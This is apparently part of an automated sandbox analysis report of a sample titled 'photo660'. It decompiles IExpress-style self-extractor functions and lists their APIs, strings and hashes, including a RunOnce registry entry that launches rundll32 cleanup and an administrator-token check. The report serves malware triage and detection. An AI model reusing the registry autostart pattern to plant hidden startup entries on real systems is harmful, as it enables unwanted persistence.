                                                                                                                                                                                                        Function 00212267 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 88registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00212267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
				signed int _t51;

				_t19 =  *0x218004; // 0x58ac7c6d
				_t20 = _t19 ^ _t51;
				_v8 = _t19 ^ _t51;
				if( *0x218530 != 0) {
					_push(_t49);
					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
						_push(_t38);
						_v844 = 0x238;
						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
							_push(_t47);
							memset( &_v268, 0, 0x104);
							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
								E0021658A( &_v268, 0x104, 0x211140);
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
							E0021171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
							_t42 =  &_v836;
							_t45 = _t42 + 1;
							_pop(_t47);
							do {
								_t33 =  *_t42;
								_t42 = _t42 + 1;
							} while (_t33 != 0);
							RegSetValueExA(_v840, "wextract_cleanup1", 0, 1,  &_v836, _t42 - _t45 + 1);
						}
						_t20 = RegCloseKey(_v840);
						_pop(_t38);
					}
					_pop(_t49);
				}
				return E00216CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
			}



















                                                                                                                                                                                                        0x00212272
                                                                                                                                                                                                        0x00212277
                                                                                                                                                                                                        0x00212279
                                                                                                                                                                                                        0x00212283
                                                                                                                                                                                                        0x00212289
                                                                                                                                                                                                        0x002122ab
                                                                                                                                                                                                        0x002122b1
                                                                                                                                                                                                        0x002122c4
                                                                                                                                                                                                        0x002122e0
                                                                                                                                                                                                        0x002122e6
                                                                                                                                                                                                        0x002122f5
                                                                                                                                                                                                        0x0021230d
                                                                                                                                                                                                        0x0021231c
                                                                                                                                                                                                        0x0021231c
                                                                                                                                                                                                        0x00212321
                                                                                                                                                                                                        0x0021233a
                                                                                                                                                                                                        0x00212342
                                                                                                                                                                                                        0x00212348
                                                                                                                                                                                                        0x0021234b
                                                                                                                                                                                                        0x0021234c
                                                                                                                                                                                                        0x0021234c
                                                                                                                                                                                                        0x0021234e
                                                                                                                                                                                                        0x0021234f
                                                                                                                                                                                                        0x0021236e
                                                                                                                                                                                                        0x0021236e
                                                                                                                                                                                                        0x0021237a
                                                                                                                                                                                                        0x00212380
                                                                                                                                                                                                        0x00212380
                                                                                                                                                                                                        0x00212381
                                                                                                                                                                                                        0x00212381
                                                                                                                                                                                                        0x0021238f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 002122A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000000,?,?,00000001), ref: 002122D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 002122F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00212305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup1,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0021236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0021237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00212299
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0021232D
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00212321
                                                                                                                                                                                                        • wextract_cleanup1, xrefs: 0021227C, 002122CD, 00212363
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 3027380567-2048191181
                                                                                                                                                                                                        • Opcode ID: 7905fcf8d6b28ea6707cc9a09013fdc75bba94e274b1db52160bf4546c9be2a4
                                                                                                                                                                                                        • Instruction ID: ec1bb472dd4bac4c0f82e933d4d567c086b597eb3a8b24d95e50f809cced1c90
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7905fcf8d6b28ea6707cc9a09013fdc75bba94e274b1db52160bf4546c9be2a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D318671A10218ABDB219B51DC89FEB7BBCEB79740F0001E5B94DA6051DA71ABE8CA50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00213100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 70windowCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00213100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t8;
				void* _t11;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t33;
				struct HWND__* _t34;

				_t8 = _a8 - 0xf;
				if(_t8 == 0) {
					if( *0x218590 == 0) {
						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
						 *0x218590 = 1;
					}
					L13:
					return 0;
				}
				_t11 = _t8 - 1;
				if(_t11 == 0) {
					L7:
					_push(0);
					L8:
					EndDialog(_a4, ??);
					L9:
					return 1;
				}
				_t15 = _t11 - 0x100;
				if(_t15 == 0) {
					_t16 = GetDesktopWindow();
					_t33 = _a4;
					E002143D0(_t33, _t16);
					SetDlgItemTextA(_t33, 0x834,  *0x218d4c);
					SetWindowTextA(_t33, "photo660");
					SetForegroundWindow(_t33);
					_t34 = GetDlgItem(_t33, 0x834);
					 *0x2188b8 = GetWindowLongA(_t34, 0xfffffffc);
					SetWindowLongA(_t34, 0xfffffffc, E002130C0);
					return 1;
				}
				if(_t15 != 1) {
					goto L13;
				}
				if(_a12 != 6) {
					if(_a12 != 7) {
						goto L9;
					}
					goto L7;
				}
				_push(1);
				goto L8;
			}









                                                                                                                                                                                                        0x00213108
                                                                                                                                                                                                        0x0021310b
                                                                                                                                                                                                        0x002131b7
                                                                                                                                                                                                        0x002131ca
                                                                                                                                                                                                        0x002131d0
                                                                                                                                                                                                        0x002131d0
                                                                                                                                                                                                        0x002131da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002131da
                                                                                                                                                                                                        0x00213111
                                                                                                                                                                                                        0x00213114
                                                                                                                                                                                                        0x00213136
                                                                                                                                                                                                        0x00213136
                                                                                                                                                                                                        0x00213138
                                                                                                                                                                                                        0x0021313b
                                                                                                                                                                                                        0x00213141
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213143
                                                                                                                                                                                                        0x00213116
                                                                                                                                                                                                        0x0021311b
                                                                                                                                                                                                        0x0021314b
                                                                                                                                                                                                        0x00213151
                                                                                                                                                                                                        0x00213158
                                                                                                                                                                                                        0x0021316a
                                                                                                                                                                                                        0x00213176
                                                                                                                                                                                                        0x0021317d
                                                                                                                                                                                                        0x0021318b
                                                                                                                                                                                                        0x0021319e
                                                                                                                                                                                                        0x002131a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002131ad
                                                                                                                                                                                                        0x00213120
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021312a
                                                                                                                                                                                                        0x00213134
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00213134
                                                                                                                                                                                                        0x0021312c
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,00000000), ref: 0021313B
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 0021314B
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000834), ref: 0021316A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,photo660), ref: 00213176
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 0021317D
                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000834), ref: 00213185
                                                                                                                                                                                                        • GetWindowLongA.USER32(00000000,000000FC), ref: 00213190
                                                                                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,002130C0), ref: 002131A3
                                                                                                                                                                                                        • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 002131CA
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                        • String ID: photo660
                                                                                                                                                                                                        • API String ID: 3785188418-1757243477
                                                                                                                                                                                                        • Opcode ID: ff15304f80dce0caebbc7763f19ab131ad2e3840b2e98a47519de5c4987bc954
                                                                                                                                                                                                        • Instruction ID: f8958fd66afdb65868f2677c8e67a4c1a651592a0678807e2b929347c526414d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff15304f80dce0caebbc7763f19ab131ad2e3840b2e98a47519de5c4987bc954
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0111B131665212BBDB219F24BC0CBDA3AE5EB7A730F108610F819911E0DFB586A1C752
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002118A3 Relevance: 16.6, APIs: 11, Instructions: 112memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E002118A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x218004; // 0x58ac7c6d
				_v8 = _t23 ^ _t53;
				_t25 =  *0x218128; // 0x2
				_t45 = 0;
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00216CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
				}
				if(E002117EE( &_v20) != 0) {
					_t25 = _v20;
					if(_v20 != 0) {
						 *0x218128 = 1;
					}
					goto L20;
				}
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
					goto L20;
				}
				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
					L17:
					CloseHandle(_v28);
					_t25 = _v20;
					goto L20;
				} else {
					_push(__esi);
					_t52 = LocalAlloc(0, _v24);
					if(_t52 == 0) {
						L16:
						_pop(_t51);
						goto L17;
					}
					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
						L15:
						LocalFree(_t52);
						goto L16;
					} else {
						if( *_t52 <= 0) {
							L14:
							FreeSid(_v32);
							goto L15;
						}
						_t15 = _t52 + 4; // 0x4
						_t50 = _t15;
						while(EqualSid( *_t50, _v32) == 0) {
							_t45 = _t45 + 1;
							_t50 = _t50 + 8;
							if(_t45 <  *_t52) {
								continue;
							}
							goto L14;
						}
						 *0x218128 = 1;
						_v20 = 1;
						goto L14;
					}
				}
			}


















                                                                                                                                                                                                        0x002118a3
                                                                                                                                                                                                        0x002118a3
                                                                                                                                                                                                        0x002118ab
                                                                                                                                                                                                        0x002118b2
                                                                                                                                                                                                        0x002118b5
                                                                                                                                                                                                        0x002118be
                                                                                                                                                                                                        0x002118c0
                                                                                                                                                                                                        0x002118c6
                                                                                                                                                                                                        0x002118c7
                                                                                                                                                                                                        0x002118ca
                                                                                                                                                                                                        0x002118cf
                                                                                                                                                                                                        0x002119c9
                                                                                                                                                                                                        0x002119d8
                                                                                                                                                                                                        0x002119d8
                                                                                                                                                                                                        0x002118df
                                                                                                                                                                                                        0x002119b8
                                                                                                                                                                                                        0x002119bd
                                                                                                                                                                                                        0x002119bf
                                                                                                                                                                                                        0x002119bf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002119bd
                                                                                                                                                                                                        0x002118fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211912
                                                                                                                                                                                                        0x002119aa
                                                                                                                                                                                                        0x002119ad
                                                                                                                                                                                                        0x002119b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211927
                                                                                                                                                                                                        0x00211927
                                                                                                                                                                                                        0x00211932
                                                                                                                                                                                                        0x00211936
                                                                                                                                                                                                        0x002119a9
                                                                                                                                                                                                        0x002119a9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002119a9
                                                                                                                                                                                                        0x0021194c
                                                                                                                                                                                                        0x002119a2
                                                                                                                                                                                                        0x002119a3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021196e
                                                                                                                                                                                                        0x00211970
                                                                                                                                                                                                        0x00211999
                                                                                                                                                                                                        0x0021199c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021199c
                                                                                                                                                                                                        0x00211972
                                                                                                                                                                                                        0x00211972
                                                                                                                                                                                                        0x00211975
                                                                                                                                                                                                        0x00211984
                                                                                                                                                                                                        0x00211985
                                                                                                                                                                                                        0x0021198a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021198c
                                                                                                                                                                                                        0x00211991
                                                                                                                                                                                                        0x00211996
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00211996
                                                                                                                                                                                                        0x0021194c

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 002117EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,002118DD), ref: 0021181A
                                                                                                                                                                                                          • Part of subcall function 002117EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0021182C
                                                                                                                                                                                                          • Part of subcall function 002117EE: AllocateAndInitializeSid.ADVAPI32(002118DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,002118DD), ref: 00211855
                                                                                                                                                                                                          • Part of subcall function 002117EE: FreeSid.ADVAPI32(?,?,?,?,002118DD), ref: 00211883
                                                                                                                                                                                                          • Part of subcall function 002117EE: FreeLibrary.KERNEL32(00000000,?,?,?,002118DD), ref: 0021188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 002118EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 002118F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0021190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00211918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 0021192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00211944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00211964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 0021197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 0021199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 002119A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002119AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 8f5002770764ed097b8aaa7e5dfcbd25eeee9be0a3391f8703987cbd3c9edfde
                                                                                                                                                                                                        • Instruction ID: 8e1708d940dd6a6073e1b33a3ce773d8e45d9c2b33cf863b351f1440b326dba1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f5002770764ed097b8aaa7e5dfcbd25eeee9be0a3391f8703987cbd3c9edfde
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 45313B71A1120AAFDB209FA5EC88AFFBBF8FF28350B104425E655D2150EB309965CB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0021468F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 50COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E0021468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
				long _t4;
				void* _t11;
				CHAR* _t14;
				void* _t15;
				long _t16;

				_t14 = __ecx;
				_t11 = __edx;
				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
				_t16 = _t4;
				if(_t16 <= _a4 && _t11 != 0) {
					if(_t16 == 0) {
						L5:
						return 0;
					}
					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
					if(_t15 == 0) {
						goto L5;
					}
					__imp__memcpy_s(_t11, _a4, _t15, _t16);
					FreeResource(_t15);
					return _t16;
				}
				return _t4;
			}








                                                                                                                                                                                                        0x00214699
                                                                                                                                                                                                        0x0021469b
                                                                                                                                                                                                        0x002146a9
                                                                                                                                                                                                        0x002146af
                                                                                                                                                                                                        0x002146b4
                                                                                                                                                                                                        0x002146bc
                                                                                                                                                                                                        0x002146f9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002146f9
                                                                                                                                                                                                        0x002146d9
                                                                                                                                                                                                        0x002146dd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002146e5
                                                                                                                                                                                                        0x002146ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002146f5
                                                                                                                                                                                                        0x002146ff

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$photo660
                                                                                                                                                                                                        • API String ID: 3370778649-2621105198
                                                                                                                                                                                                        • Opcode ID: 26d9382a14642ca35fc8f9a5730f38d8b92e98e1a266c5d66ff9ce3251e068d1
                                                                                                                                                                                                        • Instruction ID: 3f779e7f366e8b578c6bc7b33981f7ed80ccfc9880a19d7a9ac132f104b01510
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 26d9382a14642ca35fc8f9a5730f38d8b92e98e1a266c5d66ff9ce3251e068d1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A401D1322412417BE3212BA57C0CFEB3E6CDBEAB62F048114FE4D86180CDB18C9086A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0021681F Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81registryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E0021681F(void* __ebx) {
				signed int _v8;
				char _v20;
				struct _OSVERSIONINFOA _v168;
				void* _v172;
				int* _v176;
				int _v180;
				int _v184;
				void* __edi;
				void* __esi;
				signed int _t19;
				long _t31;
				signed int _t35;
				void* _t36;
				intOrPtr _t41;
				signed int _t44;

				_t36 = __ebx;
				_t19 =  *0x218004; // 0x58ac7c6d
				_v8 = _t19 ^ _t44;
				_t41 =  *0x2181d8; // 0x0
				_t43 = 0;
				_v180 = 0xc;
				_v176 = 0;
				if(_t41 == 0xfffffffe) {
					 *0x2181d8 = 0;
					_v168.dwOSVersionInfoSize = 0x94;
					if(GetVersionExA( &_v168) == 0) {
						L12:
						_t41 =  *0x2181d8; // 0x0
					} else {
						_t41 = 1;
						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
							goto L12;
						} else {
							_t31 = RegQueryValueExA(_v172, 0x211140, 0,  &_v184,  &_v20,  &_v180);
							_t43 = _t31;
							RegCloseKey(_v172);
							if(_t31 != 0) {
								goto L12;
							} else {
								_t40 =  &_v176;
								if(E002166F9( &_v20,  &_v176) == 0) {
									goto L12;
								} else {
									_t35 = _v176 & 0x000003ff;
									if(_t35 == 1 || _t35 == 0xd) {
										 *0x2181d8 = _t41;
									} else {
										goto L12;
									}
								}
							}
						}
					}
				}
				_t18 =  &_v8; // 0x21463b
				return E00216CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
			}


















                                                                                                                                                                                                        0x0021681f
                                                                                                                                                                                                        0x0021682a
                                                                                                                                                                                                        0x00216831
                                                                                                                                                                                                        0x00216836
                                                                                                                                                                                                        0x0021683c
                                                                                                                                                                                                        0x0021683e
                                                                                                                                                                                                        0x00216848
                                                                                                                                                                                                        0x00216851
                                                                                                                                                                                                        0x0021685d
                                                                                                                                                                                                        0x00216864
                                                                                                                                                                                                        0x00216876
                                                                                                                                                                                                        0x0021693a
                                                                                                                                                                                                        0x0021693a
                                                                                                                                                                                                        0x0021687c
                                                                                                                                                                                                        0x0021687e
                                                                                                                                                                                                        0x00216885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002168d6
                                                                                                                                                                                                        0x002168f4
                                                                                                                                                                                                        0x00216900
                                                                                                                                                                                                        0x00216902
                                                                                                                                                                                                        0x0021690a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021690c
                                                                                                                                                                                                        0x0021690c
                                                                                                                                                                                                        0x0021691c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021691e
                                                                                                                                                                                                        0x00216924
                                                                                                                                                                                                        0x0021692b
                                                                                                                                                                                                        0x00216932
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021692b
                                                                                                                                                                                                        0x0021691c
                                                                                                                                                                                                        0x0021690a
                                                                                                                                                                                                        0x00216885
                                                                                                                                                                                                        0x00216876
                                                                                                                                                                                                        0x00216940
                                                                                                                                                                                                        0x00216951

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0021686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 002168A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 002168CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00211140,00000000,?,?,0000000C), ref: 002168F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00216902
                                                                                                                                                                                                          • Part of subcall function 002166F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0021691A), ref: 00216741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: ;F!$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1925191194
                                                                                                                                                                                                        • Opcode ID: b6066f470fc45a2ebc55d483eb04900684e7eed695259f221c0a3c8d8124f205
                                                                                                                                                                                                        • Instruction ID: 7ef414409ea43253db9d7e96ba2b0c9922059b9bbfda23d1d9160a9200d49b22
